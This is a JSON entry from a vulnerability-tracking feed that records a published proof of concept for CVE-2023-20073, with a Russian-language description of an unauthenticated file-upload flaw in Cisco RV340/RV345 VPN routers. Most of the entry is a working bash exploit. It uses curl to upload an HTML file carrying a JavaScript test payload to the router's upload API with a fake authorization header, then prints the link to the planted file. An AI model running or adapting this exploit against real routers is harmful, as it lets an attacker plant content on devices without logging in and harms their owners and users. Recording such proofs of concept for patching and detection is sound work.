{"uuid": "8df3b2b9-8ae1-4177-af4d-11f1cd0e95a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2023-20073", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/1687", "content": "CVE-2023-20073\n\u0417\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 \u0431\u0435\u0437 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u043f\u043e\u0434\u043b\u0438\u043d\u043d\u043e\u0441\u0442\u0438  (XSS) \u0432 VPN-\u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u0430\u0445:\nCisco RV340, RV340W, RV345, RV345P \nUsage:\n#!/usr/bin/bash\nTARGET=\"https://0.0.0.0\"; \\\nFILENAME=\"login.html\"; \\\necho \"CVE-2023-20073 exploit test.alert('JS-test')\" &gt; $FILENAME; \\\ncurl -ksX POST \"$TARGET/api/operations/ciscosb-file:form-file-upload\" -H \"Authorization: 1\" -F \"pathparam=Portal\" -F \"fileparam=${FILENAME}\" -F \"file.path=${FILENAME}\" -F \"file=@${FILENAME};type=application/octet-stream\"; \\\necho \"Access the uploaded file through the following link: $TARGET/$FILENAME\"\n\n#cisco", "creation_timestamp": "2023-08-19T14:06:35.000000Z"}